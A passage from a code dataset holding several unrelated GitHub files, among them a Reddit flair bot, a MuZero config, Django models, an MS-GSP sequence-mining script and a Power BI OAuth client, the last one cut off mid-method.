logging.error(text)\n elif level == 'critical':\n logging.critical(text)\n else:\n logging.error(f'Trying to log \"{text}\", but no usable level was provided!')\n","repo_name":"tcmetzger/blaulicht-tracker","sub_path":"helpers/log_to_logfile.py","file_name":"log_to_logfile.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37586734438","text":"#/u/GoldenSights\nimport traceback\nimport praw\nimport time\nimport datetime\n\n''' USER CONFIGURATION '''\n\nAPP_ID = \"\"\nAPP_SECRET = \"\"\nAPP_URI = \"\"\nAPP_REFRESH = \"\"\n# https://www.reddit.com/comments/3cm1p8/how_to_make_your_bot_use_oauth2/\nUSERASGENT = \"\"\n# This is a description of what your bot is doing. Include your username\n# and be complete\n\nSUBREDDIT = \"randomactsofcards\"\n# The subreddit on which to operate\n\nMINIMUM_AGE = 30 * 24 * 60 * 60\n# The number of SECONDS in age for the post to receive oldflair\n# The above multiplication is 30 days.\nOLDFLAIR_TEXT = \"Fulfilled\"\nOLDFLAIR_CSS_CLASS = \"fulfilled\"\n# The text and css class for the flair which you will assign\n\nOLDFLAIR_COMMENT = \"\"\"\nYour post is 30 days old, was it ever fulfilled?\n\nLine 2,\n\nLine 3, etc etc.\n\"\"\"\n# This comment will be left on the post when it is oldflaired\n# Make the quotes empty \"\" if you don't want to leave a comment\n\nBLACKLIST = [\"[Thank You]\", \"Fulfilled\", \"thanks\"]\n# This is a list of phrases that, if they are found in the flair\n# OR THE TITLE will cause the post to be skipped from the process\n# Letter casing does not matter\n\nWAIT = 120\n# The number of seconds between cycles.\n# The bot is completely inactive during this time\n\n''' All done! '''\n\n\n\ntry:\n\timport bot\n\tUSERAGENT = bot.aG\nexcept ImportError:\n\tpass\n\nprint('Logging in to reddit')\nr = praw.Reddit(USERAGENT)\nr.set_oauth_app_info(APP_ID, APP_SECRET, APP_URI)\nr.refresh_access_information(APP_REFRESH)\n\n\n\ndef oldflair():\n\tprint('Getting submissions for %s' % SUBREDDIT)\n\tsubreddit = r.get_subreddit(SUBREDDIT)\n\tsubmissions = subreddit.get_new(limit=1000)\n\tnowstamp = datetime.datetime.now(datetime.timezone.utc)\n\tnowstamp = nowstamp.timestamp()\n\n\tfor submission in submissions:\n\t\tsid = submission.id\n\t\ttimedif = nowstamp - submission.created_utc\n\t\tprint('Checking %s: ' % sid, end=\"\")\n\t\tif timedif > MINIMUM_AGE:\n\t\t\tsflair_text = submission.link_flair_text\n\t\t\tsflair_text = sflair_text.lower() if sflair_text else ''\n\t\t\tsflair_css = submission.link_flair_css_class\n\t\t\tsflair_css = sflair_css.lower() if sflair_css else ''\n\t\t\tstitle = submission.title.lower()\n\t\t\tchecks = [sflair_text, sflair_css, stitle]\n\t\t\tif sflair_text != OLDFLAIR_TEXT.lower() and sflair_css != OLDFLAIR_CSS_CLASS.lower():\n\t\t\t\tif not any(blacklist.lower() in checks for blacklist in BLACKLIST):\n\t\t\t\t\tprint()\n\t\t\t\t\tprint('\\tAssigning oldflair')\n\t\t\t\t\tsubmission.set_flair(flair_text=OLDFLAIR_TEXT, flair_css_class=OLDFLAIR_CSS_CLASS)\n\t\t\t\t\tif OLDFLAIR_COMMENT:\n\t\t\t\t\t\tprint('\\tWriting comment')\n\t\t\t\t\t\toldcomment = submission.add_comment(OLDFLAIR_COMMENT)\n\t\t\t\t\t\tprint('\\tDistinguishing comment')\n\t\t\t\t\t\toldcomment.distinguish()\n\t\t\t\telse:\n\t\t\t\t\tprint('Contains blacklisted phrase')\n\t\t\telse:\n\t\t\t\tprint('All good')\n\t\telse:\n\t\t\tremaining = MINIMUM_AGE - timedif\n\t\t\tprint('Too young. %s remain' % format_seconds_to_hhmmss(remaining))\n\ndef format_seconds_to_hhmmss(seconds):\n\t#Copied from Stack Overflow http://stackoverflow.com/a/1384506\n\thours = seconds // (60*60)\n\tseconds %= (60*60)\n\tminutes = seconds // 60\n\tseconds %= 60\n\treturn \"%02i:%02i:%02i\" % (hours, minutes, seconds)\n\nwhile True:\n\ttry:\n\t\toldflair()\n\texcept Exception:\n\t\ttraceback.print_exc()\n\t\tprint('Sleeping 20 additional seconds')\n\t\ttime.sleep(20)\n\tprint('Sleeping %d seconds' % WAIT)\n\ttime.sleep(WAIT)","repo_name":"voussoir/reddit","sub_path":"_old/Oldflair/oldflair.py","file_name":"oldflair.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":478,"dataset":"github-code","pt":"77"} +{"seq_id":"39771805304","text":"from easydict import EasyDict\n\n# ==============================================================\n# begin of the most frequently changed config specified by the user\n# ==============================================================\ncollector_env_num = 8\nn_episode = 8\nevaluator_env_num = 3\nnum_simulations = 25\nupdate_per_collect = 100\nbatch_size = 256\nmax_env_step = int(1e5)\nreanalyze_ratio = 0\n# ==============================================================\n# end of the most frequently changed config specified by the user\n# ==============================================================\n\ncartpole_muzero_config = dict(\n exp_name=f'data_mz_ctree/cartpole_muzero_ns{num_simulations}_upc{update_per_collect}_rr{reanalyze_ratio}_seed0',\n env=dict(\n env_name='CartPole-v0',\n continuous=False,\n manually_discretization=False,\n collector_env_num=collector_env_num,\n evaluator_env_num=evaluator_env_num,\n n_evaluator_episode=evaluator_env_num,\n manager=dict(shared_memory=False, ),\n ),\n policy=dict(\n model=dict(\n observation_shape=4,\n action_space_size=2,\n model_type='mlp', \n lstm_hidden_size=128,\n latent_state_dim=128,\n self_supervised_learning_loss=True, # NOTE: default is False.\n discrete_action_encoding_type='one_hot',\n norm_type='BN', \n ),\n cuda=True,\n env_type='not_board_games',\n game_segment_length=50,\n update_per_collect=update_per_collect,\n batch_size=batch_size,\n optim_type='Adam',\n lr_piecewise_constant_decay=False,\n learning_rate=0.003,\n ssl_loss_weight=2, # NOTE: default is 0.\n num_simulations=num_simulations,\n reanalyze_ratio=reanalyze_ratio,\n n_episode=n_episode,\n eval_freq=int(2e2),\n replay_buffer_size=int(1e6), # the size/capacity of replay_buffer, in the terms of transitions.\n collector_env_num=collector_env_num,\n evaluator_env_num=evaluator_env_num,\n ),\n)\n\ncartpole_muzero_config = EasyDict(cartpole_muzero_config)\nmain_config = cartpole_muzero_config\n\ncartpole_muzero_create_config = dict(\n env=dict(\n type='cartpole_lightzero',\n import_names=['zoo.classic_control.cartpole.envs.cartpole_lightzero_env'],\n ),\n env_manager=dict(type='subprocess'),\n policy=dict(\n type='muzero',\n import_names=['lzero.policy.muzero'],\n ),\n)\ncartpole_muzero_create_config = EasyDict(cartpole_muzero_create_config)\ncreate_config = cartpole_muzero_create_config","repo_name":"opendilab/LightZero","sub_path":"lzero/policy/tests/config/cartpole_muzero_config_for_test.py","file_name":"cartpole_muzero_config_for_test.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":618,"dataset":"github-code","pt":"77"} +{"seq_id":"37798776446","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom room.models import Room \n\nclass Reservation(models.Model):\n user = models.ForeignKey(User, related_name='reservations', on_delete=models.CASCADE)\n room = models.ForeignKey(Room, related_name='reservations', on_delete=models.CASCADE)\n is_active = models.BooleanField(default=True)\n created_by = models.ForeignKey(User, related_name='created_by', on_delete=models.CASCADE)\n updated_by = models.ForeignKey(User, related_name='updated_by', on_delete=models.CASCADE)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self) -> str:\n return f'Reg No: {self.user.profile.registration_no} - Name: {self.user.first_name} {self.user.last_name}'\n\nclass Payment(models.Model):\n reservation = models.ForeignKey(Reservation, related_name='payments', verbose_name='reservations', on_delete=models.CASCADE, null=True)\n amount = models.IntegerField(default=0)\n balance = models.IntegerField(default=0)\n created_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self) -> str:\n return f'{self.reservation}'\n","repo_name":"robmainah/simple_pojects","sub_path":"hostel/reservation/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74012810489","text":"a = []\nwith open('27_B.txt') as fin:\n n = int(fin.readline())\n for i in range(n):\n a.append(int(fin.readline()))\nmaxS = 0\nminLen = n\npresum = [0] * n # префиксные суммы\ns = 0 # текущая сумма\nlefts = [None] * 43\nrights = [None] * 43\nlefts[0] = -1\nfor i in range(n):\n s += a[i]\n presum[i] = s\n t = s % 43\n if lefts[t] == None:\n lefts[t] = i\n rights[t] = i\n\nfor i in range(43):\n if lefts[i]:\n s = presum[rights[i]] - presum[lefts[i]]\n if s > maxS or s == maxS and rights[i] - lefts[i] < minLen:\n maxS = s\n minLen = rights[i] - lefts[i]\nprint(minLen)","repo_name":"binom-edu/2021-ege","sub_path":"2022-04-25/b1.py","file_name":"b1.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41386071607","text":"from django.urls import path\r\nfrom base.views import users_views as views\r\n\r\n# from rest_framework_simplejwt.views import (\r\n# TokenObtainPairView,\r\n# TokenRefreshView,\r\n# )\r\n\r\nurlpatterns = [\r\n path('login/', views.MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\r\n path('profile/' , views.getUserProfile , name = \"profile\"),\r\n path('profile/update/' , views.updateUserProfile , name = \"profile-update\"),\r\n \r\n path('' , views.getUsers , name = \"get_user\"),\r\n path('/' , views.getUserById , name = 'get-suer-by-id'),\r\n path('update/' , views.updateUser , name = 'update-user'),\r\n path('delete//' , views.deleteUser , name = \"delete-user\"),\r\n path('register/' , views.RegisterUser , name = \"register\"),\r\n \r\n]\r\n","repo_name":"punyapd/ecommerce","sub_path":"base/urls/users_urls.py","file_name":"users_urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25973310532","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author : MG\n@Time : 2018/9/7 13:35\n@File : connection_test.py\n@contact : mmmaaaggg@163.com\n@desc : 参考 https://blog.csdn.net/dutsoft/article/details/71023775\n\"\"\"\n\nimport pika\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='hello')\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body='Hello World!')\nprint(\" [x] Sent 'Hello World!'\")\nconnection.close()\n","repo_name":"mmmaaaggg/RefUtils","sub_path":"src/fh_tools/language_test/rabbitmq_test/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37737667651","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1148]:\n\n\nimport copy\nfrom collections import defaultdict\ndef main():\n count=defaultdict(int)\n F=defaultdict(list)\n k=1\n d=\"data.txt\"\n p=\"para.txt\"\n S=Read_Data(d)\n MS,SDC=Read_Para(p)\n N=len(S)\n M=[] # according to MIS(i)’s stored in MS\n for i ,v in sorted(MS.items(),key=lambda kv:kv[1]):\n M.append(i)\n L,Count_L=Init_Pass(M,S,N,MS) #first pass over S\n F[k]=F1gen(L,MS,Count_L,count,N)\n printOutput(k, F[k], count)\n k=k+1\n while (F[k-1]):\n Candidates=[]\n if k==2:\n Candidates=Cand2Gen(L,Count_L,MS,SDC,N)\n else:\n Candidates=MSCandGen(F[k-1],Count_L,SDC,MS,N) # To be Written\n for t,s in S.items():\n for cand in Candidates:\n isSequence=isSubsequence(cand,s)\n if isSequence:\n count[str(cand)]+=1\n F[k]=GenFk(Candidates,MS,count,N)\n printOutput(k, F[k], count)\n k+=1 \n return\n\n\n# In[1149]:\n\n\ndef Read_Data(file):\n with open(file) as f:\n line=f.readline()\n cnt=0\n S=defaultdict(list)\n while line: \n sequence=[]\n cnt+=1\n line=line.replace(\">\",'').replace('<','').replace(\"}{\",\"_\").replace(\"{\",\"\").replace(\"}\",\"\")\n for i in line.split(\"_\"):\n element=[]\n for item in i.split(\",\"):\n element.append(int(item.strip(\" \\n\")))\n sequence.append(element)\n S[cnt]=sequence\n line=f.readline()\n return S\n\n\n# In[1150]:\n\n\ndef Read_Para(file):\n with open(file) as f:\n line=f.readline()\n MS=defaultdict()\n while line:\n if \"MIS\" in line:\n element=line[line.find(\"(\")+1:line.find(\")\")]\n mis=line[line.find(\"=\")+1:].lstrip(\" \").lstrip(\"\\n\")\n MS[int(element)]=float(mis)\n else:SDC=float(line[line.find(\"=\")+1:].lstrip(\" \"))\n line=f.readline()\n return MS,SDC\n \n\n\n# In[1151]:\n\n\n# Initial pass over transaction and counting the occurence of each item\n#this is eliminate any item that is below the lowest MIS\ndef Init_Pass(M,S,N,MS):\n Count=defaultdict(int)\n Count_L=defaultdict(int)\n L=[]\n for i,s in S.items():\n for item in M:\n if item in sum(s,[]):\n Count[item]+=1\n for item in M:\n if float(Count[item]/N) >= float(MS[item]):\n Minimum_MIS,i=float(MS[item]),M.index(item)\n break\n \n for index in range(i,len(M)):\n if float(Count[M[index]]/N) >= Minimum_MIS:\n L.append(M[index])\n Count_L[M[index]]=Count[M[index]]\n return L,Count_L\n\n\n# In[1152]:\n\n\ndef F1gen(L,MS,Count,count, N):\n F1=[]\n for item in L:\n #Item satisfying its own MIS\n if float(Count[item]/N)>=MS[item]:\n itemString= \"[\" + str(item) +\"]\"\n count[itemString] = Count[item]\n# print(\"item--->{0} count--->{1} ms--->{2}\".format(item,Count[item],MS[item]))\n F1.append([item])\n \n return F1\n\n\n# In[1153]:\n\n\ndef Cand2Gen(L,L_count,MS,sdc,n):\n def Duplicate_Removal(C2):\n #remove candidates with same element like [10,10] and candidates not in lexicographic order like [30,20]\n C2[:] = [c for c in C2 if type(c[0]) is int and c[0]= MS[elemt]):\n\n for next_elemt in L[L.index(elemt):]:\n\n if L_count[next_elemt] >= MS[elemt] and abs ( float(L_count[next_elemt]/n) - float(L_count[elemt]/n)) <= sdc:\n\n c2.append([elemt, next_elemt])\n\n c2.append([[elemt],[next_elemt]])\n\n for next_elemt in L[:L.index(elemt)]:\n\n if L_count[next_elemt] >= MS[elemt] and abs(float(L_count[next_elemt]/n) - float(L_count[elemt]/n)) <= sdc:\n\n c2.append([elemt, next_elemt])\n\n c2.append([[elemt],[next_elemt]])\n C2=Duplicate_Removal(c2)\n return C2\n\n\n# In[1154]:\n\n\ndef isSubsequence(c,s):\n #to handle cases like [10,20,30] convert it into [[10,20,30]]\n if type(c[0]) is int:\n c=[c] \n NumElement_C=len(c)\n flag=[0]*len(s)\n index=-1\n for element in c:\n for i in range(index+1,len(s)):\n if len(element)==len(set(element)):\n if set(element).issubset(set(s[i])) and not flag[i]:\n index=i\n flag[i]=1\n break\n if sum(flag)==NumElement_C:\n return True\n else:\n return False\n\n\n# In[1155]:\n\n\ndef GenFk(Candidates,MS,count,N):\n F=[]\n for cand in Candidates:\n if type(cand[0]) is list:\n temp=sum(cand,[])\n else:temp=copy.deepcopy(cand)\n min_mis=float('inf')\n for item in temp:\n min_mis=min(min_mis,MS[item])\n if float(count[str(cand)]/N)>=float(min_mis) :\n F.append(cand)\n return F\n\n\n# In[1156]:\n\n\ndef MSCandGen(F,Lcount,SDC,MS,N):\n convert=lambda s:sum(s,[]) if type(s[0]) is list else copy.deepcopy(s) # merges lists\n candlist=[]\n \n def CheckLastMIS(s2,MS):\n convert=lambda s2:sum(s2,[]) if type(s2[0]) is list else copy.deepcopy(s2) \n temp=convert(s2)\n min_mis=float('inf')\n last_item=temp[-1]\n if len(set(temp))==1:return False # for s=[[30],[30]]\n for item in temp:\n if MS[item]<=MS[last_item] and item!=last_item:\n return False\n return True\n \n def checkIfFirstMISIsSmallest(s, MS):\n convert=lambda s2:sum(s2,[]) if type(s2[0]) is list else copy.deepcopy(s2) \n temp=convert(s)\n min_mis=float('inf')\n first_item=temp[0]\n if len(set(temp))==1:return False\n for item in temp:\n if MS[item]<=MS[first_item] and item!=first_item:\n return False\n return True\n\n def Size(s):\n if type(s[0]) is list:\n return len(s)\n else:\n return 1\n\n def length(s):\n convert=lambda s:sum(s,[]) if type(s[0]) is list else copy.deepcopy(s)\n return len(convert(s))\n \n def Last_MIS_Less(s1,s2):\n temp_s1=convert(s1)\n temp_s2=convert(s2)\n s1first=temp_s1[0]\n s2first=temp_s2[0]\n MISfirsts1=MS[temp_s1[0]]\n MISlasts2=MS[temp_s2[-1]]\n firstS1=temp_s1.pop(0) #remove first\n if len(temp_s2) == 2 :\n secondlastS2=temp_s2.pop(0)\n else:\n secondlastS2=temp_s2.pop(-2)# remove last but 1\n if temp_s1==temp_s2 and MISlasts22: # just generate c1\n if type(s2[0]) is int:\n cand=copy.deepcopy(s2)\n cand.insert(0,s1[0])\n candlist.append(cand)\n \n\n\n else:\n first=copy.deepcopy(s1[0])\n if isinstance(first,list):item=first[0]\n else:item=first \n cand=copy.deepcopy(s2)\n cand[0].insert(0,item)\n candlist.append(cand)\n \n\n\n \n def DefaultJoin(s1,s2):\n temp_s1=convert(s1)\n temp_s2=convert(s2)\n firstS1=temp_s1.pop(0) #remove first\n lastS2=temp_s2.pop()#remove last \n if temp_s1==temp_s2 and abs(float(Lcount[firstS1]/N)-float((Lcount[lastS2]/N)))<=SDC:\n last=copy.deepcopy(s2[-1])\n if type(last) is list and len(last)==1:\n if type(s1[0]) is int: \n cand=[]\n cand.append(copy.deepcopy(s1))\n cand.append(copy.deepcopy(s2[-1]))\n candlist.append(cand)\n\n else: \n cand=copy.deepcopy(s1)+[copy.deepcopy(s2[-1])] \n candlist.append(cand)\n \n else:\n if type(s1[0]) is int: # add the last element at end of list\n if isinstance(last,list):\n item=last[-1]\n else:\n item=last\n\n cand=copy.deepcopy(s1)\n cand.append(item)\n candlist.append(cand) \n\n\n\n else:\n\n if isinstance(last,list):item=last[-1]\n else:item=last\n cand=copy.deepcopy(s1)\n cand[-1].append(item)\n candlist.append(cand)\n\n\n\n \n def FirstMISList(s1, s2): \n temp_s1 = convert(s1)\n temp_s2 = convert(s2)\n pop_temp_s1 = copy.deepcopy(temp_s1)\n pop_temp_s1.pop(1) #remove s1's 2nd element\n pop_temp_s2 = temp_s2[:-1] #remove last element from s1\n \n if pop_temp_s1 == pop_temp_s2 and MS[temp_s2[-1]]>= MS[temp_s1[0]] and abs(float(Lcount.get(temp_s2[-1])/N)- float(Lcount.get(temp_s1[1])/N)) <= SDC:#check if s1 without element at 2 and s2 without last element are the same\n \n if isinstance(s2[-1], list) and length(s2[-1]) == 1: #l is added at the end of the last element of s1 to form another candidate sequence c2.\n #if last element of s2 is a list and if its the only element in it \n #if s1 is a not a list of lists\n if isinstance(s1[-1], int): \n cand=[]\n cand.append(copy.deepcopy(s1)) \n cand.append(copy.deepcopy(s2[-1]))\n candlist.append(cand)\n \n \n \n else: #if s2 is a list\n cand=copy.deepcopy(s1)+[copy.deepcopy(s2[-1])] #if s2=[[10],[20]] add just the first element of s1 as list to s2 .\n candlist.append(cand)\n \n \n\n\n if length(s1) == 2 and Size(s1) == 2 and temp_s2[-1] > temp_s1[-1]: \n #check leng and size of s1 and the last item of s2 is greater than the last item of s1\n cand=copy.deepcopy(s1)\n cand[-1].extend(copy.deepcopy(s2[-1]))\n candlist.append(cand)\n \n\n elif (length(s1) == 2 and Size(s1) == 1 and temp_s2[-1] > temp_s1[-1]) or length(s1) > 2:\n \n\n\n if type(s1[-1]) is int:\n cand=copy.deepcopy(s1)\n cand.append(s2[-1])\n candlist.append(cand)\n \n \n\n else:\n last=copy.deepcopy(s2[-1])\n if isinstance(last,list):item=last[-1]\n else:item=last\n cand=copy.deepcopy(s1)\n cand[-1].append(item) \n candlist.append(cand) \n for s1 in F:\n for s2 in F: \n if checkIfFirstMISIsSmallest(s1, MS): \n FirstMISList(s1, s2)\n elif CheckLastMIS(s2,MS):\n Last_MIS_Less(s1,s2)\n\n else:\n DefaultJoin(s1,s2)\n \n duplicate=[]\n for i in range(0, len(candlist)-1):\n for j in range(i+1, len(candlist)-2):\n if candlist[i] == candlist[j]:\n duplicate.append(candlist[i])\n for i in duplicate:\n candlist.remove(i)\n \n for c in candlist:\n if not prune(c,MS,F):\n candlist.remove(c)\n return candlist\n\n\n# In[1157]:\n\n\nimport copy\ndef prune(c,MS,F):\n def MinMIS(s, MS):\n convert=lambda s2:sum(s2,[]) if type(s2[0]) is list else copy.deepcopy(s2) \n temp=convert(s)\n Min_MIS=float('inf')\n for item in temp:\n Min_MIS=min(Min_MIS,MS[item])\n return Min_MIS \n\n Min_MIS=MinMIS(c, MS)\n if isinstance(c[0],list):\n for I in range(len(c)):\n for item in range(len(c[I])):\n temp=copy.deepcopy(c) \n if len(c[I])==1:\n temp.remove(c[I])\n if len(temp)==1:temp=temp[0]\n else:\n temp[I].remove(c[I][item])\n temp_mis=MinMIS(temp, MS)\n if temp_mis==Min_MIS:\n if temp not in F:\n return False\n \n else:\n for i in range(len(c)):\n temp=copy.deepcopy(c)\n temp.remove(c[i])\n temp_mis=MinMIS(temp, MS)\n if temp_mis==Min_MIS:\n if temp not in F:\n return False\n return True\n\n\n# In[1158]:\n\n\ndef printOutput(k, F, count):\n file = open(\"result.txt\", \"a\")\n file.write(\"\\nNo of length :{} Frequent sequences: {}\\n\".format(k, len(F)))\n for cand in F:\n cand_string = list(str(cand))\n if isinstance(cand[-1],list):\n cand_string[0] = '<'\n cand_string[-1] = '>'\n else:\n cand_string[0] = '<{'\n cand_string[-1] = '}>'\n for i in range(0, len(cand_string)):\n if(cand_string[i] == '['):\n cand_string[i] = '{'\n if(cand_string[i] == ']'):\n cand_string[i] = '}'\n if(cand_string[i] == ','):\n if(cand_string[i-1] == '}'):\n cand_string[i] = ''\n cand_string[i+1] = ''\n cand_string = ''.join(cand_string)\n file.write(\"{} count: {}\\n\".format(cand_string, count[str(cand)]))\n\n\n# In[1159]:\n\n\nif __name__ =='__main__':main() \n\n","repo_name":"parth-code/MS-GSP","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":15138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29346341889","text":"numero = input(\"Ingresa tu rut sin el digito verificador: \")\n\nlargo = len(numero)\n\nm = 1\n\nsuma = 0\n\nfor i in range(largo-1,-1,-1):\n\n m = m + 1\n\n suma = suma + int(numero[i])*m\n\n if m == 7:\n\n m = 1\n\nresto = suma % 11\n\ndv = 11 - resto\n\ndv = str(dv)\n\nif dv == \"11\":\n\n dv = \"0\"\n\nif dv == \"10\":\n\n dv = \"K\"\n\nprint(\"dv=\",dv)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_d06060e39f26ddb9e212d98d09af3cf6.py","file_name":"hito1_ej5_d06060e39f26ddb9e212d98d09af3cf6.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75041410167","text":"from typing import List\nfrom typing import Dict\nfrom typing import Union\n\nimport json\nimport msal\nimport time\nimport urllib\nimport random\nimport string\nimport pathlib\n\nfrom powerbi.session import PowerBiSession\n\n\nclass PowerBiAuth():\n\n AUTHORITY_URL = 'https://login.microsoftonline.com/'\n AUTH_ENDPOINT = '/oauth2/v2.0/authorize?'\n TOKEN_ENDPOINT = '/oauth2/v2.0/token'\n\n def __init__(\n self,\n client_id: str,\n client_secret: str,\n redirect_uri: str,\n scope: List[str],\n account_type: str = 'common',\n credentials: str = None\n ):\n \"\"\"Initializes the `PowerBiAuth` Client.\n\n ### Parameters\n ----\n client_id : str\n The application Client ID assigned when\n creating a new Microsoft App.\n\n client_secret : str\n The application Client Secret assigned when\n creating a new Microsoft App.\n\n redirect_uri : str\n The application Redirect URI assigned when\n creating a new Microsoft App.\n\n scope : List[str]\n The list of scopes you want the application\n to have access to.\n\n account_type : str (optional, Default='common')\n The account type you're application wants to\n authenticate as.\n\n credentials : str (optional, Default=None)\n The file path to your local credential file.\n \"\"\"\n\n # printing lowercase\n letters = string.ascii_lowercase\n\n self.credentials = credentials\n self.token_dict = None\n\n self.client_id = client_id\n self.client_secret = client_secret\n self.api_version = 'v1.0'\n self.account_type = account_type\n self.redirect_uri = redirect_uri\n\n self.scope = scope\n self.state = ''.join(random.choice(letters) for i in range(10))\n\n self.access_token = None\n self.refresh_token = None\n self.graph_session = None\n self.id_token = None\n\n self.graph_url = self.AUTHORITY_URL + self.account_type + self.AUTH_ENDPOINT\n\n # Initialize the Credential App.\n self.client_app = msal.ConfidentialClientApplication(\n client_id=self.client_id,\n authority=self.AUTHORITY_URL + self.account_type,\n client_credential=self.client_secret\n )\n\n def _state(self, action: str, token_dict: dict = None) -> bool:\n \"\"\"Sets the session state for the Client Library.\n\n ### Parameters\n ----\n action : str\n Defines what action to take when determining the state. Either\n `load` or `save`.\n\n token_dict : dict, optional\n If the state is defined as `save` then pass through the\n token dictionary you want to save, by default None.\n\n ### Returns\n ----\n bool :\n If the state action was successful, then returns `True`\n otherwise it returns `False`.\n \"\"\"\n\n # Determine if the Credentials file exists.\n does_exists = pathlib.Path(self.credentials).exists()\n\n # If it exists and we are loading it then proceed.\n if does_exists and action == 'load':\n\n # Load the file.\n with open(file=self.credentials, mode='r') as state_file:\n credentials = json.load(fp=state_file)\n\n # Grab the Token if it exists.\n if 'refresh_token' in credentials:\n\n self.refresh_token = credentials['refresh_token']\n self.access_token = credentials['access_token']\n self.id_token = credentials['id_token']\n self.token_dict = credentials\n\n return True\n\n else:\n return False\n\n # If we are saving the state then open the file and dump the dictionary.\n elif action == 'save':\n\n token_dict['expires_in'] = time.time(\n ) + int(token_dict['expires_in'])\n token_dict['ext_expires_in'] = time.time(\n ) + int(token_dict['ext_expires_in'])\n\n self.refresh_token = token_dict['refresh_token']\n self.access_token = token_dict['access_token']\n self.id_token = token_dict['id_token']\n self.token_dict = token_dict\n\n with open(file=self.credentials, mode='w+') as state_file:\n json.dump(obj=token_dict, fp=state_file, indent=2)\n\n def _token_seconds(self, token_type: str = 'access_token') -> int:\n \"\"\"Determines time till expiration for a token.\n\n Return the number of seconds until the current access token or refresh token\n will expire. The default value is access token because this is the most commonly used\n token during requests.\n\n ### Parameters\n ----\n token_type : str (optional, Default='access_token')\n The type of token you would like to determine lifespan for.\n Possible values are ['access_token', 'refresh_token'].\n\n ### Returns\n ----\n int : \n The number of seconds till expiration.\n \"\"\"\n\n # if needed check the access token.\n if token_type == 'access_token':\n\n # if the time to expiration is less than or equal to 0, return 0.\n if not self.access_token or (time.time() + 60 >= self.token_dict['expires_in']):\n return 0\n\n # else return the number of seconds until expiration.\n token_exp = int(self.token_dict['expires_in'] - time.time() - 60)\n\n # if needed check the refresh token.\n elif token_type == 'refresh_token':\n\n # if the time to expiration is less than or equal to 0, return 0.\n if not self.refresh_token or (time.time() + 60 >= self.token_dict['ext_expires_in']):\n return 0\n\n # else return the number of seconds until expiration.\n token_exp = int(\n self.token_dict['ext_expires_in'] - time.time() - 60\n )\n\n return token_exp\n\n def _token_validation(self, nseconds: int = 60):\n \"\"\"Checks if a token is valid.\n\n Verify the current access token is valid for at least N seconds, and\n if not then attempt to refresh it. Can be used to assure a valid token\n before making a call to the TD Ameritrade API.\n\n ### Parameters\n ----\n nseconds {int} -- The minimum number of seconds the token has to be\n valid for before attempting to get a refresh token. (default: {5})\n \"\"\"\n\n if self._token_seconds(token_type='access_token') < nseconds:\n self.grab_refresh_token()\n\n def _silent_sso(self) -> bool:\n \"\"\"Attempts a Silent Authentication using the Access Token and Refresh Token.\n\n ### Returns\n ----\n bool :\n `True` if it was successful and `False` if it failed.\n \"\"\"\n\n # if the current access token is not expired then we are still authenticated.\n if self._token_seconds(token_type='access_token') > 0:\n return True\n\n # if the current access token is expired then try and refresh access token.\n elif self.refresh_token and self.grab_refresh_token():\n return True\n\n # More than likely a first time login, so can't do silent authenticaiton.\n return False\n\n def login(self) -> None:\n \"\"\"Logs the user into the session.\"\"\"\n\n # Load the State.\n self._state(action='load')\n\n # Try a Silent SSO First.\n if self._silent_sso():\n\n # Set the Session.\n self.graph_session = PowerBiSession(client=self)\n\n return True\n\n else:\n\n # Build the URL.\n url = self.authorization_url()\n\n # aks the user to go to the URL provided, they will be prompted to authenticate themsevles.\n print('Please go to URL provided authorize your account: {}'.format(url))\n\n # ask the user to take the final URL after authentication and paste here so we can parse.\n my_response = input('Paste the full URL redirect here: ')\n\n # store the redirect URL\n self._redirect_code = my_response\n\n # this will complete the final part of the authentication process.\n self.grab_access_token()\n\n # Set the session.\n self.power_bi_session = PowerBiSession(client=self)\n\n def authorization_url(self) -> str:\n \"\"\"Builds the authorization URL used to get an Authorization Code.\n\n ### Returns\n ----\n str :\n The full authorization url.\n \"\"\"\n\n auth_url = {\n 'response_type':'code',\n 'client_id': self.client_id,\n 'redirect_uri': self.redirect_uri,\n 'resource':'https://analysis.windows.net/powerbi/api'\n }\n\n # Build the Auth URL.\n auth_url = self.client_app.get_authorization_request_url(\n scopes=self.scope,\n state=self.state,\n redirect_uri=self.redirect_uri\n )\n\n return auth_url\n\n def grab_access_token(self) -> Dict:\n \"\"\"Exchanges a code for an Access Token.\n\n ### Returns\n ----\n Dict : \n A dictionary containing a new access token and refresh token.\n \"\"\"\n\n # Parse the Code.\n query_dict = urllib.parse.parse_qs(self._redirect_code)\n\n # Grab the Code.\n code = query_dict[self.redirect_uri + \"?code\"]\n\n # Grab the Token.\n token_dict = self.client_app.acquire_token_by_authorization_code(\n code=code,\n scopes=self.scope,\n redirect_uri=self.redirect_uri\n )\n\n # Save the token dict.\n 